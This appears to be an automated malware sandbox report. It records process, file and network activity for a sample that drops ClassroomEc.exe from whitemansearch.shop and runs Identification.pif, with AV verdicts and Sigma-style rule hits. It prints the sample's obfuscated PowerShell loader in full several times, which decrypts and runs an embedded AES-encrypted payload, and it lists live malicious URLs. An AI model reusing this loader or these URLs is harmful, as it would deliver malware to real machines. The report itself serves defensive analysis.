              Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $gIWXcqO = 'AAAAAAAAAAAAAAAAAAAAAH+Ni+e0B2ks3MmnD0sjpK+fk7MupFILZ9VVeKtme+yyv7VBgriarnlhwOcDd3XnPYAZs1Tppp56hNLmknzg3RqlLZoWww3pr9GTVi4PQRFZ4Ymgg1kiMEK8k6tSH0FMP/6pzSLCCm7m343xSrtqho71KivioXDdV9RXUEizSVv/r8WV5Pa7k2Heaf/g1dNAET06jn6Lwy+3XxYBIZ8Z2SgFrwiakMLK9DaB/lEruY0OeDX+Hdr0opeUvoDL8s3TYxPu555rLX05cTD0ToGQ2y+lNPX6Fd4Bm0mfpAp0pqtz0Trl0pba/499qW6oyZTYgixjQ47fiytqQcaIZP9WkwPlfVpxMSua7NOylmdcJhQWUYN6kEASQ952Ex0UEpaIptSXAQOA6loYOMEfPb1EVPJ3uzMpl9BHjDqJhN1/oLox0/aPLc7VbmQV7FidtYCO5ezZrtDcgspB4G8S6VZ9Sjg0QNg+jHmUfYdvDUMhXrj23a1QyqUbSLMhJDW4sNDUud7HtFVqeAGS/Sl3nluTQKPifMztty2aLUs2SdQ4ofB+z/wvUPl80+6+LH5XqNj8M1Zd2OZ2juaG9QCdS6eD1lwBdfwkGK1Cexwfukroqw+5t52gJ98O+jLN7pAgKZCbb87QC9doFNVZ0xR6NVkJ3ydwbpVe9gy2uRSQ2Smekc28xEG/oGbv4H/40VYmmQ48SZmio+DL98HetDuYJDA10+uKtzg0ZRZ9tre7n2DUAlC7aKHFKe8XXTlSjeBJaB+74TbyhG6tbN3q8JEsTWFHavCG/74qYRYHv51RGapuS4YimLfGDcI+kN5tHO8qHFY2APvSJgWWvc4NaNwYwKEOdGVs3cuD2h7Z0Etr930+QCfF';$PAvNVyn = 'eW1FbE1LT2RGdGV3TXdRUlpyWFFRbnZGeFdtd1R3Z2w=';$Hgjhdnd = New-Object 'System.Security.Cryptography.AesManaged';$Hgjhdnd.Mode = [System.Security.Cryptography.CipherMode]::ECB;$Hgjhdnd.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$Hgjhdnd.BlockSize = 128;$Hgjhdnd.KeySize = 256;$Hgjhdnd.Key = [System.Convert]::FromBase64String($PAvNVyn);$fmSHI = [System.Convert]::FromBase64String($gIWXcqO);$HwKLSIPl = $fmSHI[0..15];$Hgjhdnd.IV = $HwKLSIPl;$bKVkoZaIu = $Hgjhdnd.CreateDecryptor();$woNqXSfkI = $bKVkoZaIu.TransformFinalBlock($fmSHI, 16, $fmSHI.Length - 16);$Hgjhdnd.Dispose();$LMMKhz = New-Object System.IO.MemoryStream( , $woNqXSfkI );$dYlrlK = New-Object System.IO.MemoryStream;$cYowFoTfZ = New-Object System.IO.Compression.GzipStream $LMMKhz, ([IO.Compression.CompressionMode]::Decompress);$cYowFoTfZ.CopyTo( $dYlrlK );$cYowFoTfZ.Close();$LMMKhz.Close();[byte[]] $OhXploZ = $dYlrlK.ToArray();$mkeeaJ = [System.Text.Encoding]::UTF8.GetString($OhXploZ);$mkeeaJ | powershell -, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $gIWXcqO = 'AAAAAAAAAAAAAAAAAAAAAH+Ni+e0B2ks3MmnD0sjpK+fk7MupFILZ9VVeKtme+yyv7VBgriarnlhwOcDd3XnPYAZs1Tppp56hNLmknzg3RqlLZoWww3pr9GTVi4PQRFZ4Ymgg1kiMEK8k6tSH0FMP/6pzSLCCm7m343xSrtqho71KivioXDdV9RXUEizSVv/r8WV5Pa7k2Heaf/g1dNAET06jn6Lwy+3XxYBIZ8Z2SgFrwiakMLK9DaB/lEruY0OeDX+Hdr0opeUvoDL8s3TYxPu555rLX05cTD0ToGQ2y+lNPX6Fd4Bm0mfpAp0pqtz0Trl0pba/499qW6oyZTYgixjQ47fiytqQcaIZP9WkwPlfVpxMSua7NOylmdcJhQWUYN6kEASQ952Ex0UEpaIptSXAQOA6loYOMEfPb1EVPJ3uzMpl9BHjDqJhN1/oLox0/aPLc7VbmQV7FidtYCO5ezZrtDcgspB4G8S6VZ9Sjg0QNg+jHmUfYdvDUMhXrj23a1QyqUbSLMhJDW4sNDUud7HtFVqeAGS/Sl3nluTQKPifMztty2aLUs2SdQ4ofB+z/wvUPl80+6+LH5XqNj8M1Zd2OZ2juaG9QCdS6eD1lwBdfwkGK1Cexwfukroqw+5t52gJ98O+jLN7pAgKZCbb87QC9doFNVZ0xR6NVkJ3ydwbpVe9gy2uRSQ2Smekc28xEG/oGbv4H/40VYmmQ48SZmio+DL98HetDuYJDA10+uKtzg0ZRZ9tre7n2DUAlC7aKHFKe8XXTlSjeBJaB+74TbyhG6tbN3q8JEsTWFHavCG/74qYRYHv51RGapuS4YimLfGDcI+kN5tHO8qHFY2APvSJgWWvc4NaNwYwKEOd
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $gIWXcqO = 'AAAAAAAAAAAAAAAAAAAAAH+Ni+e0B2ks3MmnD0sjpK+fk7MupFILZ9VVeKtme+yyv7VBgriarnlhwOcDd3XnPYAZs1Tppp56hNLmknzg3RqlLZoWww3pr9GTVi4PQRFZ4Ymgg1kiMEK8k6tSH0FMP/6pzSLCCm7m343xSrtqho71KivioXDdV9RXUEizSVv/r8WV5Pa7k2Heaf/g1dNAET06jn6Lwy+3XxYBIZ8Z2SgFrwiakMLK9DaB/lEruY0OeDX+Hdr0opeUvoDL8s3TYxPu555rLX05cTD0ToGQ2y+lNPX6Fd4Bm0mfpAp0pqtz0Trl0pba/499qW6oyZTYgixjQ47fiytqQcaIZP9WkwPlfVpxMSua7NOylmdcJhQWUYN6kEASQ952Ex0UEpaIptSXAQOA6loYOMEfPb1EVPJ3uzMpl9BHjDqJhN1/oLox0/aPLc7VbmQV7FidtYCO5ezZrtDcgspB4G8S6VZ9Sjg0QNg+jHmUfYdvDUMhXrj23a1QyqUbSLMhJDW4sNDUud7HtFVqeAGS/Sl3nluTQKPifMztty2aLUs2SdQ4ofB+z/wvUPl80+6+LH5XqNj8M1Zd2OZ2juaG9QCdS6eD1lwBdfwkGK1Cexwfukroqw+5t52gJ98O+jLN7pAgKZCbb87QC9doFNVZ0xR6NVkJ3ydwbpVe9gy2uRSQ2Smekc28xEG/oGbv4H/40VYmmQ48SZmio+DL98HetDuYJDA10+uKtzg0ZRZ9tre7n2DUAlC7aKHFKe8XXTlSjeBJaB+74TbyhG6tbN3q8JEsTWFHavCG/74qYRYHv51RGapuS4YimLfGDcI+kN5tHO8qHFY2APvSJgWWvc4NaNwYwKEOdGVs3cuD2h7Z0Etr930+QCfF';$PAvNVyn = 'eW1FbE1LT2RGdGV3TXdRUlpyWFFRbnZGeFdtd1R3Z2w=';$Hgjhdnd = New-Object 'System.Security.Cryptography.AesManaged';$Hgjhdnd.Mode = [System.Security.Cryptography.CipherMode]::ECB;$Hgjhdnd.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$Hgjhdnd.BlockSize = 128;$Hgjhdnd.KeySize = 256;$Hgjhdnd.Key = [System.Convert]::FromBase64String($PAvNVyn);$fmSHI = [System.Convert]::FromBase64String($gIWXcqO);$HwKLSIPl = $fmSHI[0..15];$Hgjhdnd.IV = $HwKLSIPl;$bKVkoZaIu = $Hgjhdnd.CreateDecryptor();$woNqXSfkI = $bKVkoZaIu.TransformFinalBlock($fmSHI, 16, $fmSHI.Length - 16);$Hgjhdnd.Dispose();$LMMKhz = New-Object System.IO.MemoryStream( , $woNqXSfkI );$dYlrlK = New-Object System.IO.MemoryStream;$cYowFoTfZ = New-Object System.IO.Compression.GzipStream $LMMKhz, ([IO.Compression.CompressionMode]::Decompress);$cYowFoTfZ.CopyTo( $dYlrlK );$cYowFoTfZ.Close();$LMMKhz.Close();[byte[]] $OhXploZ = $dYlrlK.ToArray();$mkeeaJ = [System.Text.Encoding]::UTF8.GetString($OhXploZ);$mkeeaJ | powershell -, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $gIWXcqO = 'AAAAAAAAAAAAAAAAAAAAAH+Ni+e0B2ks3MmnD0sjpK+fk7MupFILZ9VVeKtme+yyv7VBgriarnlhwOcDd3XnPYAZs1Tppp56hNLmknzg3RqlLZoWww3pr9GTVi4PQRFZ4Ymgg1kiMEK8k6tSH0FMP/6pzSLCCm7m343xSrtqho71KivioXDdV9RXUEizSVv/r8WV5Pa7k2Heaf/g1dNAET06jn6Lwy+3XxYBIZ8Z2SgFrwiakMLK9DaB/lEruY0OeDX+Hdr0opeUvoDL8s3TYxPu555rLX05cTD0ToGQ2y+lNPX6Fd4Bm0mfpAp0pqtz0Trl0pba/499qW6oyZTYgixjQ47fiytqQcaIZP9WkwPlfVpxMSua7NOylmdcJhQWUYN6kEASQ952Ex0UEpaIptSXAQOA6loYOMEfPb1EVPJ3uzMpl9BHjDqJhN1/oLox0/aPLc7VbmQV7FidtYCO5ezZrtDcgspB4G8S6VZ9Sjg0QNg+jHmUfYdvDUMhXrj23a1QyqUbSLMhJDW4sNDUud7HtFVqeAGS/Sl3nluTQKPifMztty2aLUs2SdQ4ofB+z/wvUPl80+6+LH5XqNj8M1Zd2OZ2juaG9QCdS6eD1lwBdfwkGK1Cexwfukroqw+5t52gJ98O+jLN7pAgKZCbb87QC9doFNVZ0xR6NVkJ3ydwbpVe9gy2uRSQ2Smekc28xEG/oGbv4H/40VYmmQ48SZmio+DL98HetDuYJDA10+uKtzg0ZRZ9tre7n2DUAlC7aKHFKe8XXTlSjeBJaB+74TbyhG6tbN3q8JEsTWFHavCG/74qYRYHv51RGapuS4YimLfGDcI+kN5tHO8qHFY2APvSJgWWvc4NaNwYwKEOd
              Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: 30253\Identification.pif 30253\m , CommandLine: 30253\Identification.pif 30253\m , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k move Avoid Avoid.bat & Avoid.bat & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7812, ParentProcessName: cmd.exe, ProcessCommandLine: 30253\Identification.pif 30253\m , ProcessId: 8140, ProcessName: Identification.pif
              Source: Process startedAuthor: Hieu Tran: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $gIWXcqO = 'AAAAAAAAAAAAAAAAAAAAAH+Ni+e0B2ks3MmnD0sjpK+fk7MupFILZ9VVeKtme+yyv7VBgriarnlhwOcDd3XnPYAZs1Tppp56hNLmknzg3RqlLZoWww3pr9GTVi4PQRFZ4Ymgg1kiMEK8k6tSH0FMP/6pzSLCCm7m343xSrtqho71KivioXDdV9RXUEizSVv/r8WV5Pa7k2Heaf/g1dNAET06jn6Lwy+3XxYBIZ8Z2SgFrwiakMLK9DaB/lEruY0OeDX+Hdr0opeUvoDL8s3TYxPu555rLX05cTD0ToGQ2y+lNPX6Fd4Bm0mfpAp0pqtz0Trl0pba/499qW6oyZTYgixjQ47fiytqQcaIZP9WkwPlfVpxMSua7NOylmdcJhQWUYN6kEASQ952Ex0UEpaIptSXAQOA6loYOMEfPb1EVPJ3uzMpl9BHjDqJhN1/oLox0/aPLc7VbmQV7FidtYCO5ezZrtDcgspB4G8S6VZ9Sjg0QNg+jHmUfYdvDUMhXrj23a1QyqUbSLMhJDW4sNDUud7HtFVqeAGS/Sl3nluTQKPifMztty2aLUs2SdQ4ofB+z/wvUPl80+6+LH5XqNj8M1Zd2OZ2juaG9QCdS6eD1lwBdfwkGK1Cexwfukroqw+5t52gJ98O+jLN7pAgKZCbb87QC9doFNVZ0xR6NVkJ3ydwbpVe9gy2uRSQ2Smekc28xEG/oGbv4H/40VYmmQ48SZmio+DL98HetDuYJDA10+uKtzg0ZRZ9tre7n2DUAlC7aKHFKe8XXTlSjeBJaB+74TbyhG6tbN3q8JEsTWFHavCG/74qYRYHv51RGapuS4YimLfGDcI+kN5tHO8qHFY2APvSJgWWvc4NaNwYwKEOdGVs3cuD2h7Z0Etr930+QCfF';$PAvNVyn = 'eW1FbE1LT2RGdGV3TXdRUlpyWFFRbnZGeFdtd1R3Z2w=';$Hgjhdnd = New-Object 'System.Security.Cryptography.AesManaged';$Hgjhdnd.Mode = [System.Security.Cryptography.CipherMode]::ECB;$Hgjhdnd.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$Hgjhdnd.BlockSize = 128;$Hgjhdnd.KeySize = 256;$Hgjhdnd.Key = [System.Convert]::FromBase64String($PAvNVyn);$fmSHI = [System.Convert]::FromBase64String($gIWXcqO);$HwKLSIPl = $fmSHI[0..15];$Hgjhdnd.IV = $HwKLSIPl;$bKVkoZaIu = $Hgjhdnd.CreateDecryptor();$woNqXSfkI = $bKVkoZaIu.TransformFinalBlock($fmSHI, 16, $fmSHI.Length - 16);$Hgjhdnd.Dispose();$LMMKhz = New-Object System.IO.MemoryStream( , $woNqXSfkI );$dYlrlK = New-Object System.IO.MemoryStream;$cYowFoTfZ = New-Object System.IO.Compression.GzipStream $LMMKhz, ([IO.Compression.CompressionMode]::Decompress);$cYowFoTfZ.CopyTo( $dYlrlK );$cYowFoTfZ.Close();$LMMKhz.Close();[byte[]] $OhXploZ = $dYlrlK.ToArray();$mkeeaJ = [System.Text.Encoding]::UTF8.GetString($OhXploZ);$mkeeaJ | powershell -, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $gIWXcqO = 'AAAAAAAAAAAAAAAAAAAAAH+Ni+e0B2ks3MmnD0sjpK+fk7MupFILZ9VVeKtme+yyv7VBgriarnlhwOcDd3XnPYAZs1Tppp56hNLmknzg3RqlLZoWww3pr9GTVi4PQRFZ4Ymgg1kiMEK8k6tSH0FMP/6pzSLCCm7m343xSrtqho71KivioXDdV9RXUEizSVv/r8WV5Pa7k2Heaf/g1dNAET06jn6Lwy+3XxYBIZ8Z2SgFrwiakMLK9DaB/lEruY0OeDX+Hdr0opeUvoDL8s3TYxPu555rLX05cTD0ToGQ2y+lNPX6Fd4Bm0mfpAp0pqtz0Trl0pba/499qW6oyZTYgixjQ47fiytqQcaIZP9WkwPlfVpxMSua7NOylmdcJhQWUYN6kEASQ952Ex0UEpaIptSXAQOA6loYOMEfPb1EVPJ3uzMpl9BHjDqJhN1/oLox0/aPLc7VbmQV7FidtYCO5ezZrtDcgspB4G8S6VZ9Sjg0QNg+jHmUfYdvDUMhXrj23a1QyqUbSLMhJDW4sNDUud7HtFVqeAGS/Sl3nluTQKPifMztty2aLUs2SdQ4ofB+z/wvUPl80+6+LH5XqNj8M1Zd2OZ2juaG9QCdS6eD1lwBdfwkGK1Cexwfukroqw+5t52gJ98O+jLN7pAgKZCbb87QC9doFNVZ0xR6NVkJ3ydwbpVe9gy2uRSQ2Smekc28xEG/oGbv4H/40VYmmQ48SZmio+DL98HetDuYJDA10+uKtzg0ZRZ9tre7n2DUAlC7aKHFKe8XXTlSjeBJaB+74TbyhG6tbN3q8JEsTWFHavCG/74qYRYHv51RGapuS4YimLfGDcI+kN5tHO8qHFY2APvSJgWWvc4NaNwYwKEOd
              Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4408, TargetFilename: C:\Users\user\AppData\Roaming\ClassroomEc.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $gIWXcqO = 'AAAAAAAAAAAAAAAAAAAAAH+Ni+e0B2ks3MmnD0sjpK+fk7MupFILZ9VVeKtme+yyv7VBgriarnlhwOcDd3XnPYAZs1Tppp56hNLmknzg3RqlLZoWww3pr9GTVi4PQRFZ4Ymgg1kiMEK8k6tSH0FMP/6pzSLCCm7m343xSrtqho71KivioXDdV9RXUEizSVv/r8WV5Pa7k2Heaf/g1dNAET06jn6Lwy+3XxYBIZ8Z2SgFrwiakMLK9DaB/lEruY0OeDX+Hdr0opeUvoDL8s3TYxPu555rLX05cTD0ToGQ2y+lNPX6Fd4Bm0mfpAp0pqtz0Trl0pba/499qW6oyZTYgixjQ47fiytqQcaIZP9WkwPlfVpxMSua7NOylmdcJhQWUYN6kEASQ952Ex0UEpaIptSXAQOA6loYOMEfPb1EVPJ3uzMpl9BHjDqJhN1/oLox0/aPLc7VbmQV7FidtYCO5ezZrtDcgspB4G8S6VZ9Sjg0QNg+jHmUfYdvDUMhXrj23a1QyqUbSLMhJDW4sNDUud7HtFVqeAGS/Sl3nluTQKPifMztty2aLUs2SdQ4ofB+z/wvUPl80+6+LH5XqNj8M1Zd2OZ2juaG9QCdS6eD1lwBdfwkGK1Cexwfukroqw+5t52gJ98O+jLN7pAgKZCbb87QC9doFNVZ0xR6NVkJ3ydwbpVe9gy2uRSQ2Smekc28xEG/oGbv4H/40VYmmQ48SZmio+DL98HetDuYJDA10+uKtzg0ZRZ9tre7n2DUAlC7aKHFKe8XXTlSjeBJaB+74TbyhG6tbN3q8JEsTWFHavCG/74qYRYHv51RGapuS4YimLfGDcI+kN5tHO8qHFY2APvSJgWWvc4NaNwYwKEOdGVs3cuD2h7Z0Etr930+QCfF';$PAvNVyn = 'eW1FbE1LT2RGdGV3TXdRUlpyWFFRbnZGeFdtd1R3Z2w=';$Hgjhdnd = New-Object 'System.Security.Cryptography.AesManaged';$Hgjhdnd.Mode = [System.Security.Cryptography.CipherMode]::ECB;$Hgjhdnd.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$Hgjhdnd.BlockSize = 128;$Hgjhdnd.KeySize = 256;$Hgjhdnd.Key = [System.Convert]::FromBase64String($PAvNVyn);$fmSHI = [System.Convert]::FromBase64String($gIWXcqO);$HwKLSIPl = $fmSHI[0..15];$Hgjhdnd.IV = $HwKLSIPl;$bKVkoZaIu = $Hgjhdnd.CreateDecryptor();$woNqXSfkI = $bKVkoZaIu.TransformFinalBlock($fmSHI, 16, $fmSHI.Length - 16);$Hgjhdnd.Dispose();$LMMKhz = New-Object System.IO.MemoryStream( , $woNqXSfkI );$dYlrlK = New-Object System.IO.MemoryStream;$cYowFoTfZ = New-Object System.IO.Compression.GzipStream $LMMKhz, ([IO.Compression.CompressionMode]::Decompress);$cYowFoTfZ.CopyTo( $dYlrlK );$cYowFoTfZ.Close();$LMMKhz.Close();[byte[]] $OhXploZ = $dYlrlK.ToArray();$mkeeaJ = [System.Text.Encoding]::UTF8.GetString($OhXploZ);$mkeeaJ | powershell -, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $gIWXcqO = 'AAAAAAAAAAAAAAAAAAAAAH+Ni+e0B2ks3MmnD0sjpK+fk7MupFILZ9VVeKtme+yyv7VBgriarnlhwOcDd3XnPYAZs1Tppp56hNLmknzg3RqlLZoWww3pr9GTVi4PQRFZ4Ymgg1kiMEK8k6tSH0FMP/6pzSLCCm7m343xSrtqho71KivioXDdV9RXUEizSVv/r8WV5Pa7k2Heaf/g1dNAET06jn6Lwy+3XxYBIZ8Z2SgFrwiakMLK9DaB/lEruY0OeDX+Hdr0opeUvoDL8s3TYxPu555rLX05cTD0ToGQ2y+lNPX6Fd4Bm0mfpAp0pqtz0Trl0pba/499qW6oyZTYgixjQ47fiytqQcaIZP9WkwPlfVpxMSua7NOylmdcJhQWUYN6kEASQ952Ex0UEpaIptSXAQOA6loYOMEfPb1EVPJ3uzMpl9BHjDqJhN1/oLox0/aPLc7VbmQV7FidtYCO5ezZrtDcgspB4G8S6VZ9Sjg0QNg+jHmUfYdvDUMhXrj23a1QyqUbSLMhJDW4sNDUud7HtFVqeAGS/Sl3nluTQKPifMztty2aLUs2SdQ4ofB+z/wvUPl80+6+LH5XqNj8M1Zd2OZ2juaG9QCdS6eD1lwBdfwkGK1Cexwfukroqw+5t52gJ98O+jLN7pAgKZCbb87QC9doFNVZ0xR6NVkJ3ydwbpVe9gy2uRSQ2Smekc28xEG/oGbv4H/40VYmmQ48SZmio+DL98HetDuYJDA10+uKtzg0ZRZ9tre7n2DUAlC7aKHFKe8XXTlSjeBJaB+74TbyhG6tbN3q8JEsTWFHavCG/74qYRYHv51RGapuS4YimLfGDcI+kN5tHO8qHFY2APvSJgWWvc4NaNwYwKEOd
              No Snort rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
              Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
              Source: https://2no.co/2ZrVm4hnAvira URL Cloud: Label: malware
              Source: https://2no.co/2ZrVm4;Set-ItemPropertyAvira URL Cloud: Label: malware
              Source: https://2no.co/2ZrVm4Avira URL Cloud: Label: malware
              Source: http://whitemansearch.shop/ClassroomEc.exeVirustotal: Detection: 5%Perma Link
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeReversingLabs: Detection: 28%
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeVirustotal: Detection: 49%Perma Link
              Source: https://www.google.com/sorry/index?continue=https://www.google.com/&q=EgS_YOPeGL7F1q4GIjBwAWbomQLbaJKyWdrTAZ9MKsU5Vq2-V7iqyHfa4-ZPY5fgDT5PQDrRGB3-eVas0UEyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMHTTP Parser: No favicon
              Source: https://www.google.com/sorry/index?continue=https://www.google.com/&q=EgS_YOPeGL7F1q4GIjBwAWbomQLbaJKyWdrTAZ9MKsU5Vq2-V7iqyHfa4-ZPY5fgDT5PQDrRGB3-eVas0UEyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMHTTP Parser: No favicon
              Source: https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b&co=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbTo0NDM.&hl=en&v=yiNW3R9jkyLVP5-EEZLDzUtA&size=normal&s=xz3LsDhnVKWNDPAxYsfSai-65gQfUWB55L8TFubhcQqJlrltbCH3uiMgqw9QAslta7P_yQ2bZH1ORXgoYVB-hTK_zEC7bXvNca4AZA-u_gcND1aHqzQAuQdE8YR_32tCw2qLxz-xd4-Z3Nm9D50Nbwkns7louT2dRkQLmWk-2Dn-QozQIbnlAs_c6yUIm5PKVMMSXO7KlIPqv21jVxvuhA6gVzHJJcirmiwhSjBz4o70vFTT38JJB0MyLvqVTg1YM6Qx6WiknHHxvIM6RlgthjUDYRm3_PM&cb=px5dhzo8o1yuHTTP Parser: No favicon
              Source: https://www.google.com/recaptcha/api2/bframe?hl=en&v=yiNW3R9jkyLVP5-EEZLDzUtA&k=6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1bHTTP Parser: No favicon
              Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49735 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 23.51.58.94:443 -> 192.168.2.5:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 23.51.58.94:443 -> 192.168.2.5:49713 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.5:49732 version: TLS 1.2
              Source: Binary string: calc.pdbGCTL source: mshta.exe, 00000000.00000003.1993161798.0000000002BAC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2003730258.000000000966E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1993040179.0000000002BA6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1992163204.0000000002BA1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2003680117.0000000002BB8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2004768775.000000000966F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1993408260.0000000002BB2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2003973332.0000000002BE9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2003585857.0000000002BE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1991920596.0000000002B9B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wkernel32.pdb source: Identification.pif, 00000013.00000003.2953589381.0000000001990000.00000004.00000001.00020000.00000000.sdmp
              Source: Binary string: wkernelbase.pdb source: Identification.pif, 00000013.00000003.2954114221.0000000008B10000.00000004.00000001.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: Identification.pif, 00000013.00000003.2953335217.0000000008A90000.00000004.00000001.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2953190049.00000000088F0000.00000004.00000001.00020000.00000000.sdmp
              Source: Binary string: calc.pdb source: mshta.exe, 00000000.00000003.1993161798.0000000002BAC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2003730258.000000000966E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1993040179.0000000002BA6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1992163204.0000000002BA1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2004768775.000000000966F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1993408260.0000000002BB2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1991920596.0000000002B9B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: Identification.pif, 00000013.00000003.2953335217.0000000008A90000.00000004.00000001.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2953190049.00000000088F0000.00000004.00000001.00020000.00000000.sdmp
              Source: Binary string: wkernelbase.pdbUGP source: Identification.pif, 00000013.00000003.2954114221.0000000008B10000.00000004.00000001.00020000.00000000.sdmp
              Source: Binary string: wkernel32.pdbUGP source: Identification.pif, 00000013.00000003.2953589381.0000000001990000.00000004.00000001.00020000.00000000.sdmp
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeCode function: 8_2_00A75080 FindFirstFileW,FindClose,SetFileAttributesW,DeleteFileW,8_2_00A75080
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeCode function: 8_2_00A73C80 FindFirstFileW,FindClose,SetLastError,CompareFileTime,8_2_00A73C80
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeCode function: 8_2_00A74ED0 _DebugHeapAllocator,FindFirstFileW,_DebugHeapAllocator,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetCurrentDirectoryW,SetFileAttributesW,RemoveDirectoryW,8_2_00A74ED0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior

              Networking

              barindex
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhost
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx-reuseport/1.21.1Date: Wed, 21 Feb 2024 07:14:07 GMTContent-Type: application/octet-streamContent-Length: 1212711Last-Modified: Tue, 20 Feb 2024 15:43:47 GMTConnection: keep-aliveKeep-Alive: timeout=30ETag: "65d4c8b3-128127"Expires: Fri, 22 Mar 2024 07:14:07 GMTCache-Control: max-age=2592000Accept-Ranges: bytesData Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 1f 00 94 82 5b 61 fa d1 5b 61 fa d1 5b 61 fa d1 52 19 7e d1 59 61 fa d1 52 19 6f d1 5c 61 fa d1 52 19 79 d1 4d 61 fa d1 52 19 69 d1 4a 61 fa d1 5b 61 fb d1 98 61 fa d1 34 17 64 d1 59 61 fa d1 34 17 50 d1 5f 61 fa d1 34 17 51 d1 6a 61 fa d1 34 17 60 d1 5a 61 fa d1 34 17 67 d1 5a 61 fa d1 52 69 63 68 5b 61 fa d1 00 00 00 00 00 00 00 00 00 00 00 00 00 